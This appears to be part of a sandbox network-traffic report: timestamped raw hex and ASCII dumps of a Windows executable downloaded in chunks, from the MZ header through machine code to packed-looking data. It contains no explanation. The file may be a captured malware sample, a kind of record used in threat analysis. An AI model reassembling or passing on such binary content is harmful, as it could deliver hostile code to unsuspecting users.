                                                                                                                                                                                                          2023-03-17 08:23:17 UTC0INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52
                                                                                                                                                                                                          Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
                                                                                                                                                                                                          2023-03-17 08:23:17 UTC8INData Raw: f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b 0f 83 76 01 00 00 8b f7 48 03 f6 8b 44 f3 04 4c 3b
                                                                                                                                                                                                          Data Ascii: BDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;vHDL;
                                                                                                                                                                                                          2023-03-17 08:23:17 UTC16INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:17 UTC16INData Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f
                                                                                                                                                                                                          Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
                                                                                                                                                                                                          2023-03-17 08:23:17 UTC24INData Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00
                                                                                                                                                                                                          Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
                                                                                                                                                                                                          2023-03-17 08:23:17 UTC32INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC32INData Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b
                                                                                                                                                                                                          Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC40INData Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d
                                                                                                                                                                                                          Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC48INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC48INData Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d
                                                                                                                                                                                                          Data Ascii: 4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC56INData Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2
                                                                                                                                                                                                          Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC64INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC64INData Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28
                                                                                                                                                                                                          Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC72INData Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15
                                                                                                                                                                                                          Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC80INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC80INData Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff
                                                                                                                                                                                                          Data Ascii: 4000HD$ tX$$$HD$ a|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC88INData Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00
                                                                                                                                                                                                          Data Ascii: @> ?-DT!?AsAA
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC96INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC96INData Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0
                                                                                                                                                                                                          Data Ascii: 40000~@P`pX~x~
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC104INData Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c
                                                                                                                                                                                                          Data Ascii: hVxWXY<v
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC112INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC112INData Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15
                                                                                                                                                                                                          Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC120INData Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11
                                                                                                                                                                                                          Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC128INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC128INData Raw: 34 30 30 30 0d 0a 66 40 00 00 7c ec 01 00 68 40 00 00 ee 40 00 00 54 eb 01 00 f0 40 00 00 7a 42 00 00 30 ec 01 00 7c 42 00 00 12 43 00 00 14 ea 01 00 14 43 00 00 01 44 00 00 b8 ec 01 00 04 44 00 00 8c 44 00 00 14 ea 01 00 bc 44 00 00 02 45 00 00 e4 e9 01 00 04 45 00 00 3b 45 00 00 e4 e9 01 00 50 45 00 00 68 45 00 00 c8 ed 01 00 70 45 00 00 71 45 00 00 cc ed 01 00 80 45 00 00 81 45 00 00 d0 ed 01 00 bc 45 00 00 0a 47 00 00 d4 ed 01 00 0c 47 00 00 51 47 00 00 e4 e9 01 00 54 47 00 00 9a 47 00 00 e4 e9 01 00 9c 47 00 00 e2 47 00 00 e4 e9 01 00 e4 47 00 00 35 48 00 00 54 eb 01 00 38 48 00 00 99 48 00 00 f0 ea 01 00 b0 48 00 00 f0 48 00 00 f0 ed 01 00 00 49 00 00 2a 49 00 00 f8 ed 01 00 30 49 00 00 56 49 00 00 00 ee 01 00 60 49 00 00 a7 49 00 00 08 ee 01 00 a8
                                                                                                                                                                                                          Data Ascii: 4000f@|h@@T@zB0|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC136INData Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac
                                                                                                                                                                                                          Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC144INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC144INData Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30
                                                                                                                                                                                                          Data Ascii: 4000JRvruq:'8#v}HHMQBFMad>wHDS/Aq=qb0iZ@l{rXa^U?AqkqbAQP9{- Z"Xadwf<Ay85FFX}|oUuDE$>wn7R(.wk?ytu#<r"dad>wfDSAy{b4}[< #1M`kqdu,dM8T0
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC152INData Raw: 61 47 0c da 74 4f 55 71 b6 6f 55 4a 09 ce b0 e4 72 78 3c 11 b5 2c 14 01 b9 23 bc 48 33 a5 ee d8 66 64 35 9c 41 26 45 bc c9 8b 2f 6b 65 81 b6 a3 f9 ea 0d c8 fe 83 90 b9 d6 5f b5 fd e8 26 51 42 b5 cd eb 65 6b 00 58 9d 35 7a d2 a3 9d 30 44 53 17 a5 65 39 be 9e a9 65 41 43 21 91 72 78 fb 1d 18 38 84 4d 51 42 b5 3c 17 32 86 6e b7 ff b4 0e 77 76 e3 61 9f c8 ef ee 8d 3e 3f 2b 2c 87 41 43 b4 f1 99 7f 3c 59 73 2c cf de 90 e7 dc 4f 33 62 64 81 d4 8c 32 7a 53 ad 0b ed 50 94 ad 8b 62 39 3f b3 b1 62 41 c2 80 94 76 78 3c dc da bb b5 a0 d4 a2 33 48 33 a8 02 00 61 e5 80 9a 54 26 45 64 3d 8d ad e0 e0 d9 38 2b 71 26 ca c6 dd 73 71 78 b7 0d 18 38 bb ac 89 45 34 48 ba 26 4f 20 89 3b 03 7a 53 9e 52 77 44 53 c1 0d 98 c6 c0 ec f4 ba 46 43 35 74 b1 78 3c e1 35 a3 0d ac da cf ec
